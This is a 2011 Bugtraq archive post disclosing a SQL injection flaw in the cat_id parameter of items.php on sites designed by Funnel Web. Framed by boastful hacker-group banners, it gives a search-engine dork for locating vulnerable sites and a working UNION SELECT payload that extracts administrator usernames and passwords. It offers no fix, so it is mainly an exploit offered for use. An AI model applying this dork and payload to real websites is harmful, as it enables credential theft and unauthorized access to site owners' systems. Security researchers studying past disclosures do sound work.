Bugtraq mailing list archives
Funnel Web (items.php?&cat_id) Remote SQL injection Vulnerability
From: ehsan_hp200 () hotmail com
Date: Tue, 26 Jul 2011 08:50:39 GMT
############################### IRANIAN THE BEST HACKERS IN THE WORLD ################## #################### #################### ## ## Remote SQL injection Vulnerability ## ## Funnel Web (items.php?&cat_id) ## ############################################################### ############################################################### ############################################################### ############################################################### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : Ehsan_Hp200 () Hotmail com ## ## Vendor : http://www.funnel-web.com.au/ ## ## Persian Gulf 4 Ever! ############################# ############################# ############################# ############################# ############################# ## ## Dork : "Web site design by Funnel Web" "inurl:items.php" Exploite: www.victim.com/items.php?&cat_id=-1+Union+Select+1,concat(user_id,0x3a,user_pw),1+From+admin-- ######################################################################################### SpeCial TanX To : Dj7Xpl ########################################################################################## ############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################
Current thread:
- Funnel Web (items.php?&cat_id) Remote SQL injection Vulnerability ehsan_hp200 (Jul 26)